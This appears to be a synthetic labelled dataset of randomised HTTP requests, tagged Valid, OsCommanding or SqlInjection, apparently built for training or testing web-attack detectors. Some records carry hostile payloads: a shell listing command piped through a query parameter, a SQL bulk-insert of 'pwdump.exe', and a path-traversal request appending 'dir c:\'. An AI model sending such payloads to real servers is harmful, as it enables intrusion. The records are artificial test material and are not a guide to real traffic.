MIME-Version: 9.4
Pragma: lt=nnins
Proxy-Authorization: Basic ZHJocXJ6dTA6d3J0YWE=
Authorization: Digest uri=/socsed/Dglr.css
Range: 42992-
Referer: /ONcstf/ipwdeeth/aeduu0u/shi7p.msf
TE: chunked;q=0.2,trailers,trailers
Trailer: Warning
User-Agent: yN0rmkmNs5rnbaKtcsl
UA-CPU: Sparc
UA-Disp: 612,8755,32
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 879x932
Via: nlxtn/4.2 www.qaquGae.css:4, FTP/5.3 www.eetsuiog.htm:9103
Transfer-Encoding: jptem
Upgrade: idoj/6.1, g7eoil/4.7, cotot/9.8, ewrnb/5.4, 2axs/6.7
Warning: 808 www.ijlnho.jpg "ret3nreoOTgbbr" "Sun, 29 Jan 06 04:11:57 GMT"
X-Forwarded-For: 34.245.202.84
X-Serial-Number: 2079694360100759
----: -----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 32004
Start - Id: 43227
class: OsCommanding
GET /am-8A/weebnedmaq4oe08/nY3XLN4nC2J7/Dzuhwrenucm/nbVpmIH5E/fee/AesLp9dsoaeiHe.js?Rall%uw-=ls+++++-las++++%2Fhome%2F+%7C HTTP/1.0
Host: www.l8rhae.ch
Connection: keep-alive
Accept: */*;q=0.3
Accept-Charset: *
Accept-Encoding: identity
Accept-Language: uiss-etNt;q=0.3, iir-arntres;q=0.8
Cache-Control: only-if-cached
Client-ip: 226.147.245.10
Cookie: iservices5MAp=fe pto;gebeaaasie7lts=68367911;imgGiHiA=340;s8oeuku=aSy3gj9
Cookie2: $Version="4"
Date: Sat, 30 Jul 05 05:15:53 GMT
ETag: "9rx-BTA31mnSsAa2XM1t"
Expect: cko1p=sTwOsene
From: Odth@g78cnm.uk
If-Modified-Since: Sat, 16 Jan 10 22:51:16 GMT
If-Unmodified-Since: Fri, 30 Sep 05 23:16:02 GMT
If-Match: *
If-None-Match: "HeTYceLao@b4Ykm"
If-Range: Mon, 26 Jan 04 23:18:35 CET
Max-Forwards: 38
MIME-Version: 4.4
Pragma: t1=pnthant
Proxy-Authorization: Digest username="9indy"
Authorization: s9ill 6adxlyv=9a7l
Range: 31-76831,27556-
Referer: /te3tSs/saht/snhItoe.asmx
TE: trailers
Trailer: Referer
User-Agent: b-KsLJ http://www.thIlAalo.net
UA-CPU: x86
UA-Disp: 1503,1276,8
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 476x125
Via: HTTP/8.3 www.ewoa7kf3.htm, FTP/0.8 www.ehnltt.jpg, FTP/9.7 65.1.208.140
Transfer-Encoding: identity
Upgrade: gSz/4.2, Gseoi/5.8, rch5/7.9, 6re6d/0.4
Warning: 539 112.163.9.207 "rxe9Jsee" 
X-Forwarded-For: 25.139.59.161
X-Serial-Number: 3512760212193
----: ----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43227
Start - Id: 13698
class: Valid
GET /ssvalnbeytany/d31IU6kDp0R1M/7he/dlttcvk7reie/hefd2aasmE4La/7qo_xallZZ77p-/aeeee/n3KCNtDZmTf/esf/t.t1CMm9@eVrO0/tswg5seCnhwSfuhrel/q8_yV-nSKi.php3?s0EvEz1de=laeoaeo9e3n HTTP/1.0
Host: www.vsb7sora6.gov
Connection: keep-alive
Accept: image/jpeg, image/*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *;q=0.4
Cache-Control: no-store
Client-ip: 8.252.160.20
Cookie: tuthatrpTshr=LLl-oOeln;gi0lifeete=N ;sps=01485;Loatlmc='oio;veVDf3Iv8GSN=6777707;8n=einsertoW6yaechoreHea1Ttt ae
Cookie2: $Version="554"
Date: Fri, 10 Oct 08 04:29:09 CET
ETag: W/"h1UUMblmY5tubv8d"
Expect: 100-continue
From: s29eksF@wcAom7est.fr
If-Modified-Since: Fri, 31 Oct 08 23:51:55 GMT
If-Unmodified-Since: Mon, 28 May 07 13:59:00 GMT
If-Match: "SFI6nCGASwXQbBgP"
If-None-Match: "5dm5YN2pQtNeCGhPw"
If-Range: Wed, 13 Apr 05 24:43:24 UTC
Max-Forwards: 00
MIME-Version: 8.5
Pragma: no-cache
Proxy-Authorization: Basic c251dXl0OmdoempzdQ==
Authorization: Basic ZW1kYmhuN286b3NxZW9tbGQ=
Range: 7428-
Referer: /pswLfr/ieahe8sO.aspx
TE: trailers,trailers,chunked;q=0.4
Trailer: TE
User-Agent: etKjc2 http://www.nbiy.uk
UA-CPU: PowerPC
UA-Disp: 146,6247,32
UA-OS: Linux
UA-Color: color32
UA-Pixels: 757x935
Via: HTTP/8.0 www.hdelb.htm, 8.5 www.nltdw.js
Transfer-Encoding: gzip
Upgrade: eeelg/7.7, utMy/3.6, isxk/2.7, aitvl/7.3
Warning: 963 www.nr6uio.htm "hGclte" 
X-Forwarded-For: 18.131.227.185
X-Serial-Number: 1852790108043394492
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 13698
Start - Id: 15198
class: Valid
GET /l7aRlwmUoatUSse/npfduiedr3gsnhUue/GrcpDQT4A/Agsrtv/ncfl98dinANadIa.php3?ece=e%263RdFfaec2u&65CI6hwinqIY=o8eoedVirrCh&sCoO1FmNhttpvMtmp=t26L5&soiss=367800392 HTTP/1.0
Host: www.6uirt2daie.com
Connection: keep-alive
Accept: */*
Accept-Charset: windows-1258, windows-1251;q=0.8, windows-1250;q=0.7, big5, windows-1257
Accept-Encoding: 
Accept-Language: *;q=0.7
Cache-Control: max-age=025
Client-ip: 49.90.43.231
Cookie: 3zZNncdUt=a 88=;eipfti=94131942;w5pwl==h$;0s=hetwt;reuisEilsrS=pisdhboot.inipea=n]lIeR;dct97gTomaupee=c@Ai
Cookie2: $Version="700"
Date: Mon, 24 Jul 06 05:13:15 CET
ETag: W/"xCeoa3pmieGCTn6"
Expect: 100-continue
From: ltpredhx@Enoq.be
If-Modified-Since: Fri, 15 Apr 05 06:50:09 UTC
If-Unmodified-Since: Sat, 02 Jan 10 07:34:26 CET
If-Match: "1jWzowMPzzJWXYef"
If-None-Match: "T9QuZqQJlcoaDP_02g"
If-Range: *
Max-Forwards: 6109
MIME-Version: 1.4
Pragma: isiteh=Md
Proxy-Authorization: Digest realm
Authorization: 2oKd dti7nal=t6ihpnaA
Range: 478892-,53727-
Referer: http://www.i6pel9cr.de/jrndo/ipiy4ica/4luh.shtml
TE: gzip,trailers
Trailer: Upgrade
User-Agent: Mozilla/2.1 (Machintosh; U; PPC Mac OS X 7.5; e3-ii; rv:4.5.8) Gecko/17801706
UA-CPU: x86
UA-Disp: 450,4767,8
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 1443x630
Via: veu/1.2 www.AteDyiL.shtml, 0.2 205.46.47.165
Transfer-Encoding: ueXs; soereh=woSao
Upgrade: ul7E/4.8, 6ds/5.5, SCn/3.1, eut/7.8
Warning: 672 146.81.253.52 "jtadl" "Mon, 09 Feb 04 19:26:43 CET"
X-Forwarded-For: 236.127.123.213
X-Serial-Number: 01906983974999
----: ----------------------
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 15198
Start - Id: 21449
class: Valid
GET /pIujFkhwZ/7bcbFMzhlHF/betweenJQopenxwp-EkwEOAPKR.bin?ieuey=91022973&7Xy1gaMZob=samio%5Ded+hnga4B9h%26l%27&umtsnmPom=7018&@3ZJCAY49=nt%3Esd+s0aanEOezhlm&Nodtnnteatt=horpbinh+c7dScsock_streamnetcat&et2rc=sAgBB%40&ihhriz=tc&eunGryrniv0dai=oH0&siesimasjgiA=50&4nesuvgh=ote7roctYTod HTTP/1.1
Host: 13.37.157.108
Connection: keep-alive
Accept: */*
Accept-Charset: windows-1250, us-ascii, x-mac-roman, iso-8859-6;q=0.8
Accept-Encoding: 
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 91.48.79.53
Cookie: voloa=t09Z7gl4;uceereutidn7o=eKaXb-hYi;WVlvpGEdCwinnt=proq
Cookie2: $Version="9"
Date: Sun, 31 Aug 08 20:49:46 UTC
ETag: "3pOkOzvuYT1pRHd"
Expect: oteA=anomr
From: eaheebse@4eGrkw.uk
If-Modified-Since: Thu, 01 Feb 07 07:56:55 CET
If-Unmodified-Since: Sat, 27 Jan 07 12:27:13 GMT
If-Match: "PRK1qq7uVeowQmhbJ2em"
If-None-Match: "SWqtoes@mBC-uAQh-w9"
If-Range: *
Max-Forwards: 761
MIME-Version: 2.5
Pragma: no-cache
Proxy-Authorization: NTLM eXBoc2toeG9BbnRsbGVkZmFiZTJvcnJpTGNyNVljdzJsZW5hdXV1bnJuRTByb0U=
Authorization: nest eeciete=ewh3oo
Range: 21333-1766,-00,-67436
Referer: /anebwte/euhsn6so/nonbE/tdyvvblA.fgf
TE: trailers
Trailer: TE
User-Agent: Mozilla/1.1 (Windows; U; Win 9x 1.2; hs-eh; rv:2.1.1) Gecko/16703405
UA-CPU: Sparc
UA-Disp: 738,354,32
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 2698x837
Via: 1.8 108.63.231.247, 2.9 117.183.242.95, 5.7 115.101.218.28
Transfer-Encoding: qlso
Upgrade: oiTi9i/7.3, ta8/0.8, sosmnS/8.4, at5n/2.0, pnrmtu/8.5
Warning: 868 www.psaerr.png "ieSephnp" 
X-Forwarded-For: 153.129.48.252
X-Serial-Number: 321441502
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 21449
Start - Id: 24032
class: Valid
GET /dYXOcHBgMyQg6Sb9fL1@/d0n/ZLd2.css?RfztcK7Zu=56848&wTu=62394&om=mt%3Dbalb%40+tsa&eilt=%25oeR&Me=adn%40er3s&enwvpal=%24jih&sIl=e&group byxZYKdropVadmin2=0.Jl.ep8.6o&tuluewneR=a4-rol4.FbZl HTTP/1.0
Host: www.allkxeeiri.be
Connection: keep-alive
Accept: */*
Accept-Charset: windows-1251;q=0.8
Accept-Encoding: *;q=0.9
Accept-Language: *
Cache-Control: min-fresh=87706
Client-ip: 74.66.216.205
Cookie: ifhr09h0ntres=20439014;nmnullvP=ansOi;i7=9757;9atossutet=00;ceIrh=d7;senqoipzb=efk8N
Cookie2: $Version="952"
Date: Thu, 29 Jun 06 16:13:52 CET
ETag: "s7ixD4fsb@27TuT"
Expect: 100-continue
From: hsh4@9pafyeek.be
If-Modified-Since: Tue, 16 Mar 10 16:43:56 GMT
If-Unmodified-Since: Sun, 11 Dec 05 16:03:39 UTC
If-Match: *
If-None-Match: "8TJvPSBuVa97yob"
If-Range: "uzxGPqGG4cAUyddT"
Max-Forwards: 98
MIME-Version: 5.9
Pragma: no-cache
Proxy-Authorization: Basic M2VxbDpkbXQwQXRlZQ==
Authorization: Basic ZXZudGM6STZoeDRl
Range: 3-,-932
Referer: http://GntEqdYc.net/f3keu/dnetoe/sfinsCue.gz
TE: gzip;q=0.4
Trailer: Date
User-Agent: aayie/6.1.3.9
UA-CPU: PowerPC
UA-Disp: 4414,5382,32
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 314x0873
Via: 6.9 247.195.114.46, 5.7 190.241.112.251
Transfer-Encoding: gzip
Upgrade: h3rE/8.7, eogee/2.9, td0aa/8.5, toirs/3.2, Lme/4.0
Warning: 560 www.e6Dyu8.png "snbntciioi9G" "Wed, 08 Apr 09 10:48:35 GMT"
X-Forwarded-For: 60.32.75.53
X-Serial-Number: 2341111640499
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 24032
Start - Id: 11368
class: Valid
GET /tgmnattwaedsbs9nokr/s9owlae/JejK5/ragLoe2o.png? HTTP/1.1
Host: 23.99.253.252:80
Connection: close
Accept: */*;q=0.3
Accept-Charset: iso-8859-6, koi8-r;q=0.6, x-mac-ce;q=0.2
Accept-Encoding: gzip, identity, identity;q=0.0, identity, deflate;q=0.6
Accept-Language: E-rMoete
Cache-Control: max-stale=28433
Client-ip: 242.179.130.228
Cookie: Ei=a&4;pnteiha=eJexecg;ay=379
Cookie2: $Version="94"
Date: Wed, 24 Feb 10 08:41:28 GMT
ETag: "AL1P3Im9xyb_Ng.B"
Expect: 100-continue
From: ap2s@tiVznaj.com
If-Modified-Since: Tue, 12 Jul 05 18:18:20 UTC
If-Unmodified-Since: Sun, 24 May 09 01:34:21 CET
If-Match: *
If-None-Match: "3q.rYOOFtMCC7MHSCAw"
If-Range: *
Max-Forwards: 86
MIME-Version: 6.3
Pragma: no-cache
Proxy-Authorization: Digest cnonce="rtslr"
Authorization: ebhg 4anbf=8win
Range: -6791,6-,-511169
Referer: /enat.conf
TE: deflate,gzip,chunked;q=0.1
Trailer: Referer
User-Agent: Mozilla/7.8 (Machintosh; U; Mac OS X 0.0; ne-pj; rv:9.7.4) Gecko/88637453
UA-CPU: StrongARM
UA-Disp: 018,4597,8
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 6133x6762
Via: HTTP/6.7 232.250.239.83:5193, FTP/2.5 113.214.103.178
Transfer-Encoding: jIgwf
Upgrade: iAsv/6.0, wsydh/9.0, asdrd/6.4, ea7/7.8
Warning: 883 www.eeiyiwe.jpeg "akusdr" 
X-Forwarded-For: 100.230.251.99
X-Serial-Number: 0505318
----: ------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 11368
Start - Id: 8658
class: Valid
GET /0tl/t4EDkZtek/Ocy4zee7sjnw/lHlLLeUy.Gr..D10awX/nrnorhgd1fohhgar/Pyepycera/AI./92ti/roolwbrslcNoeamhejl.php?bnavlsoergAfeei=i7SmMmwkp-z&on9ziE=uSaevalfsiid&ip=b&ulNaee34rretnoa=cA1&Bf3FBsMK68=hgc9disud&dotrh3sueh=3987240 HTTP/1.1
Host: www.caaocl1ene.net
Connection: keep-alive
Accept: */*
Accept-Charset: euc-kr;q=0.7
Accept-Encoding: gzip, deflate;q=0.9, compress;q=0.1, gzip;q=0.2, compress;q=0.4
Accept-Language: *;q=0.7
Cache-Control: no-cache
Client-ip: 177.129.186.148
Cookie: Smt=pARFdln;IN0dE3YKtmpvbscriptin.=54;nbuoiiso= b;YaLaSisai=843489584
Cookie2: $Version="41"
Date: Wed, 14 Jan 04 06:45:02 CET
ETag: "bqqF@POc4a5wCT5plef"
Expect: huicy=ryees
From: iqTi@9hcauaorqk.fr
If-Modified-Since: Fri, 11 Jan 08 11:32:27 UTC
If-Unmodified-Since: Fri, 23 Jul 04 03:28:21 UTC
If-Match: *
If-None-Match: ".ReVoySZWnt64xPX"
If-Range: Sun, 01 Feb 09 03:05:45 GMT
Max-Forwards: 740
MIME-Version: 4.8
Pragma: no-cache
Proxy-Authorization: Digest nc=ADd2Cfd8
Authorization: NTLM aGFjN242MG9uZHRsbGltb3ZGeHV4ZW9zbjdpbjNjM3Bl
Range: -766,58-986789
Referer: /rNSntm/G2tt1n8.dll
TE: deflate,deflate;q=0.2
Trailer: Host
User-Agent: Mozilla/7.1 (Windows; U; Windows NT 8.7; ea-j5; rv:6.5.7) Gecko/55230664
UA-CPU: 68000
UA-Disp: 051,717,32
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 8393x485
Via: 2.8 www.opf12T10.jpeg, web/0.1 110.74.228.217:99444
Transfer-Encoding: fse6; odieatp=ten9xnc2
Upgrade: tul6nr/8.0, k5roha/7.1, edhia/4.1, tben/5.7
Warning: 888 www.beiaIt.css "S3j3Xr4oawsaaadt" "Mon, 27 Aug 07 01:27:20 GMT"
X-Forwarded-For: 71.14.68.150
X-Serial-Number: 396730650206
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 8658
Start - Id: 3663
class: Valid
GET /rysoErspsA/hgVjxBuyXYFGLOXsuMr@/dawaiHikrt1j/mle8gxetoe/hlS/Xxwinnt13iQLtmpz/4UQgroup byilinkSselectJ/otattrwfhaassHrr7ki/wtcSzDHiframeI_4Z@/tnrwNtGsi/GoXG-BDformGllRoY/mey9M7GbUdi-Qn.css?ht4tAotYlgo507f=eL%3Dtfss&sdkmriets=tsohidppinir&rpsTVboot.iniishutdown@lB2U=r%40PLPaye2k&afa=+af%25&cl62TneRi=laq%3C%7Es&nl5Mact=SlhwbOtta%3A&rbrrphVw5CI8=thtaccesteghs&lovast=03&FArUnQkC=qnph-ghtpassieonsaNy%7Ce&h1oonV0i=n2nhemo&ecmlo=Sinmplike&tsohm0rcirl0efe=copyeyscriptioe7 HTTP/1.1
Host: 88.4.180.48
Connection: keep-alive
Accept: */*
Accept-Charset: koi8, x-mac-icelandic;q=0.8
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-cache
Client-ip: 44.24.157.133
Cookie: thIsrzymtrtt=t q:qoaunionwhere hpeCh 
Cookie2: $Version="5"
Date: Sat, 31 Jan 04 09:28:22 UTC
ETag: W/"QPdlQShUKUiYq.7"
Expect: 100-continue
From: esm0b@Yeiw.net
If-Modified-Since: Thu, 18 Nov 04 14:04:56 CET
If-Unmodified-Since: Fri, 21 Dec 07 20:28:37 UTC
If-Match: *
If-None-Match: "6i-ggCAciA-tN.Bb4Nv"
If-Range: *
Max-Forwards: 02
MIME-Version: 4.6
Pragma: v='ouhs'
Proxy-Authorization: Basic bnJudXQ6b2VlMQ==
Authorization: Digest cnonce="etdA"
Range: 07-4663,96574-4817,28-
Referer: /c0ytte3/bcso/ewrwm.pdf
TE: chunked,trailers,trailers
Trailer: If-Unmodified-Since
User-Agent: hdxtu (poD6ptd)
UA-CPU: MIPS
UA-Disp: 1100,347,32
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 1057x068
Via: FTP/1.8 5.196.147.162:3778, FTP/1.2 www.OhmesiMh.js, elaftn/2.4 www.uneSlnte.jpeg
Transfer-Encoding: Eh00t
Upgrade: oail/4.8, aTsyih/8.0
Warning: 645 www.las2ihke.js "0xmtaiit6e4g" "Thu, 25 May 06 21:49:28 GMT"
X-Forwarded-For: 153.114.223.45
X-Serial-Number: 760698596875297
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 3663
Start - Id: 8109
class: Valid
GET /aST/sKFCPgtx4kbFSs1/wirritaa/sReRhtsey2oehtshtf/wP/iYkX1JEPuLUUd@r75H/raissudmnei/h0HUxj3bx2h361BITSm/hhlasnatngdnstllnoNT.mspx?rFKsock_streamVNf=158561052&e_5G2nX.LwY=1tmhndhehra0&aeOahOrd5svbop=o7rcaO7e&lhmawnUemseete8=2309485&yomI7pde=cCcra&f7ltstYa=52&dossdA=ttasns&5a=966345&l0cnqiui=up2mBlTcaOw&txn=itwvwie%3Eg+ab&iNxtvhedaeehyn=585803&h5e=x9CUO8T1yoX. HTTP/1.0
Host: www.3auafeYor.gov:28456
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: *;q=0.0
Accept-Language: *;q=0.3
Cache-Control: max-age=7872
Client-ip: 96.68.165.0
Cookie: gUtipr=otmdaOEso;ekol9bre4oeoeNt=0EuK@;guzomE=lxoletePNametHgEs;sqese=>
Cookie2: $Version="9"
Date: Sat, 20 Mar 10 08:16:45 CET
ETag: W/"CZWPkSwaIeP-1oH"
Expect: 100-continue
From: rresLtr@tskRf.com
If-Modified-Since: Sat, 16 Jun 07 09:25:02 CET
If-Unmodified-Since: Fri, 26 Mar 04 04:24:23 UTC
If-Match: *
If-None-Match: *
If-Range: "v-3Ytwwa295MH.Bqsmg"
Max-Forwards: 346
MIME-Version: 5.9
Pragma: no-cache
Proxy-Authorization: NTLM YnRmOHFvQnd1dnliTGlBZHdJeElBZUFUZTVhY0V5dHNpZGI3N25lbmtkUmk=
Authorization: l3bus naio=eowlny
Range: 96926-503180,-72
Referer: /exbzpels/Otzs/eirax.sh
TE: trailers,deflate
Trailer: User-Agent
User-Agent: smBhe5riEsas
UA-CPU: 68000
UA-Disp: 4009,1990,32
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 366x7348
Via: 9.7 www.uz3ruoc.gif
Transfer-Encoding: gzip
Upgrade: hossa/8.6
Warning: 207 www.eaigb.htm "nqposom8cjoD7Vewo1b" 
X-Forwarded-For: 17.216.217.132
X-Serial-Number: 844737801649
----: ------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 8109
Start - Id: 19105
class: Valid
GET /hOYSx2xV1QzmufeyZ/m@Z/ejellUonbdsdiosvrso/tdShwC@Q_6iKBLA/4KYkaIZK8aKsFn/lui4HnbStercuy/idQLmwSv3InI/e@8XIc/KrG.dJyNbgsoundeDr/lfIs2lVH4h3nBi-XgjGM/ieOjA6JEq3QvcV_SYu/mkun8oaze.aspx? HTTP/1.0
Host: www.ar5eaog9w.be
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: *;q=0.1
Accept-Language: *
Cache-Control: no-cache
Client-ip: 200.237.246.60
Cookie: woeh=0960508431;otwvt4gpWAS=ztoUaaokoecn8;oqs9tsrhaznie=951376150
Cookie2: $Version="47"
Date: Sun, 01 Feb 04 12:08:31 GMT
ETag: W/"ybTiqqPUXJhv01KIDA9"
Expect: 100-continue
From: dvelvane@qhwetaoqup.st
If-Modified-Since: Fri, 14 Jul 06 06:16:07 CET
If-Unmodified-Since: Sat, 11 Aug 07 07:04:56 GMT
If-Match: *
If-None-Match: *
If-Range: Thu, 17 Jan 08 03:48:20 CET
Max-Forwards: 0
MIME-Version: 7.3
Pragma: no-cache
Proxy-Authorization: Digest uri=http://rhDeEzl.com/8Sfrs8nS.tiff
Authorization: Digest opaque="ru40"
Range: 2-,-0,87927-654
Referer: http://jnEGoeih.biz/aruniv3/bfetcci2/tatie/eotw6j/EeEsr.pdf
TE: chunked,chunked;q=0.9,trailers
Trailer: Transfer-Encoding
User-Agent: eee6aslfh6f0Wac4mih
UA-CPU: x86
UA-Disp: 2540,4307,8
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 315x9224
Via: 5.5 www.ozrtln.htm:427, 3.4 www.zirUrno.jpeg, 1.2 129.208.79.204
Transfer-Encoding: identity
Upgrade: uh18/7.6, a1w/5.6, ydmr/7.2, o5j/2.9, rmIai/6.0
Warning: 947 www.RRed.htm "sieaizuOuewergir" "Sun, 14 Nov 04 07:40:45 UTC"
X-Forwarded-For: 31.76.137.109
X-Serial-Number: 4037701883
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~

null

End - Id: 19105
Start - Id: 35035
class: SqlInjection
GET /hdaLhzj_MipsWas/8Dhtaccesogy3J5dM/drcecyfss/0L_U/pzcmHubre/r-U5/h1.J2Gnw-kkieq1rI-.0/e4r.htm?ti=106527826&lt=bulk+insert++++Dyas+from+++%27pwdump.exe%27+++++with++%28codepage%3D%27RAW%27++%29&leeetzlso=830&bA68Kb=wnXeoba&tyec=yHtsyVd72&in=hepasswdtSwnkxjrsg&aceuizetsnapvd=ERlt&otVea=eqcJa%40Ha&obGkyaaestdCag=icmeuxOredxto&QxtermOsWT3=135281&geh=76397 HTTP/1.0
Host: 161.78.124.241
Connection: 7tiibme
Accept: image/*;q=0.1
Accept-Charset: koi8;q=0.7, cp-932
Accept-Encoding: 
Accept-Language: kaaxtfei-2o, 0-q;q=0.5
Cache-Control: max-stale=64
Client-ip: 70.74.68.114
Date: Tue, 11 Aug 09 07:21:16 UTC
If-Modified-Since: Mon, 18 Apr 05 23:26:23 CET
If-Unmodified-Since: Fri, 02 Feb 07 01:03:20 UTC
If-Match: "pqyLo..u@gR_YOMkbEjm"
If-None-Match: "FTM9O3AVyJKps7G"
Max-Forwards: 124
Referer: /liihsfdi/imut/etrfdv.nsf
User-Agent: tbFoeeiexw (vJLYglUlZX; oqkm0mq6; thpLYcdm; sQAF9stI)
UA-Color: color8
Transfer-Encoding: deflate

null

End - Id: 35035
Start - Id: 44493
class: OsCommanding
GET /scripts/..�../..�../mssql7/install/pubtext.bat" & dir c:\ .exe? HTTP/1.0
Host: www.EtySzeeayp.ch
Connection: close
Accept: video/quicktime;q=0.2, image/png, text/plain
Accept-Charset: ks_c_5601-1987;q=0.5, utf-8, cp-936;q=0.2, x-mac-japanese;q=0.9
Accept-Encoding: *
Accept-Language: *;q=0.2
Cache-Control: e='dr'
Client-ip: 224.120.218.101
Cookie: 4bH3yyservicesg=Et;rannaeaRsceer=eIt;ncuPyNxLf_75xml=i@hJoZV;9erwst=lUbD_ldfp;ntiu3tsma=soNyqFoZcd;Dneeesehntyeo=eaydZrje6b
Cookie2: $Version="7"
Date: Mon, 17 May 04 04:27:35 CET
ETag: "brWHOt3l4ea9t1DC"
Expect: 100-continue
From: tea5l@h4so.net
If-Modified-Since: Mon, 23 Mar 09 13:48:11 CET
If-Unmodified-Since: Sun, 06 Mar 05 21:44:55 GMT
If-Match: "WESv2dH1wwZ5eQ5Vx@e"
If-None-Match: "hHxYE5g60ui.qGzhd"
If-Range: "v-lub7Me1IPbwi8kUN"
Max-Forwards: 2
MIME-Version: 5.5
Pragma: fzeofL3i=kaer
Proxy-Authorization: NTLM Z2VpdXJ0b2FubGVFNG95ZWhvZmVwckZkdDF0d2ltcW5kZGRobnRrT2hl
Authorization: Tnlkti vi8a=htsteu
Range: -80,3-,-9028
Referer: /rr2Eo.nsf
TE: chunked;q=0.3,deflate,trailers
Trailer: Via
User-Agent: Mozilla/5.1 (Windows; U; Win98 6.9; t7-6j; rv:5.1.1) Gecko/25502508
UA-CPU: Sparc
UA-Disp: 3780,9274,8
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 949x9593
Via: 5.1 110.42.33.9, 2.8 158.35.234.113:79358
Transfer-Encoding: compress
Upgrade: tNaw/6.0, n1eien/5.5, iol/1.2, Rlt5/6.0
Warning: 079 172.67.80.251:54 "7stpts" 
X-Forwarded-For: 106.107.95.22
X-Serial-Number: 75943929627
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44493
Start - Id: 26710
class: Valid
GET /4.6sock_stream/nkbnhq87F/tscsnpoat9s/tuEbe5/ktee/tX5Q@wiNlZCZmG/I0/ee3aso/b@Qqj2Nl4_0o/t2.cfm?ldife=wavfm&wrhacaeo0=r%3Boy+Thmsystemzunion&pQ9y4v=7779887&eee=mPWzDu&ddyia1q=072349 HTTP/1.1
Host: www.atnScbci.be
Connection: aMa1eSz
Accept: */*;q=0.0
Accept-Charset: *
Accept-Encoding: *;q=0.7
Accept-Language: HUonppa1-4ete;q=0.3, niR-oagn9srf
Cache-Control: max-age=2721
Client-ip: 41.69.153.49
Cookie: mgm=omt2s;1goptMdORiQM=7o;9yoyyvtllTeTet=4564;9eEosystsnnfnhn=2;O9pmdRnha=8410
Cookie2: $Version="091"
Date: Mon, 16 Apr 07 10:08:01 CET
ETag: "T8@J8mWCMvFmLewuG"
Expect: 100-continue
From: LhagleWG@oti0.gov
If-Modified-Since: Sun, 18 Sep 05 18:01:33 GMT
If-Unmodified-Since: Wed, 03 Sep 08 10:22:39 GMT
If-Match: *
If-None-Match: *
If-Range: Mon, 16 Oct 06 23:10:49 GMT
Max-Forwards: 22
MIME-Version: 1.9
Pragma: no-cache
Proxy-Authorization: Xtgt8g gueh9=jopucso
Authorization: eoEt seofyett=etNeRo
Range: 704-,903943-39311
Referer: http://Jicnws.net/aoaheia/ntx8ao/re1trlah/madtr/ttt6ya.tiff
TE: deflate;q=0.5,gzip;q=0.1,trailers
Trailer: User-Agent
User-Agent: hF7GA44RL http://www.dv8lnum.it
UA-CPU: 68000
UA-Disp: 221,658,16
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 873x2179
Via: 7.4 11.171.211.237:0, 5.9 151.50.202.70:96642
Transfer-Encoding: gzip
Upgrade: iagr/3.7
Warning: 653 www.rIlbwe.html:51762 "pn4htodnstaeHz" "Sat, 18 Dec 04 07:27:35 UTC"
X-Forwarded-For: 241.3.2.199
X-Serial-Number: 838236
----: ----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 26710
Start - Id: 9099
class: Valid
GET /dnO09q6X7wg4.zCMnv6I/Pjc4bemh6/rBk3raX1/laA/nas5xg1SSqBjWzP/uRGxpNRIuL/wrbCD1zU/rd0rblk.gif?ol9=qHDzUbC3sCc&stuamnrx32onid=rh%3E0%3Einputseidevalrxcopy8fkh&5csa=3412&osgmt01nhacgrvo=t1k%40fyh&Ah8n-SIGgroup by=3afperl4&7el3tyqnudrrnhA=5217518&hpftqaeG=%3Fgtt&tdwhdNt21ypnm=%24aibr&G_Sv481jTPt=8976197&ArZG.O40=h.IL.J4IPvfE&adoniir=faF8Ye8M&uFau=9935992&t5nendnpos4ene=232&eeas6toVemsdtbr=akE&yoeothtllno9A=re6gd HTTP/1.1
Host: 130.44.217.219:665
Connection: mh7rta
Accept: */*;q=0.6
Accept-Charset: *
Accept-Encoding: *;q=0.3
Accept-Language: ollld5se-nueQa, rh-iopnp;q=0.0, S-rinonoe;q=0.3, rnocm-8ti, uis-amc;q=0.6
Cache-Control: min-fresh=644
Client-ip: 139.120.114.243
Cookie: b0saio=nLu-mdm
Cookie2: $Version="10"
Date: Sun, 23 Nov 08 19:00:43 GMT
ETag: W/"Sj1Kw3Jd.KTBTmancGJz"
Expect: atctr7=tetz0Vi;iurtb
From: eo0inrr@xinaejal.fr
If-Modified-Since: Sun, 17 May 09 12:48:56 GMT
If-Unmodified-Since: Fri, 05 Oct 07 01:02:13 GMT
If-Match: "NYrM59He53D0OP8TGxJp"
If-None-Match: "aK82CuBix6QMvNk3"
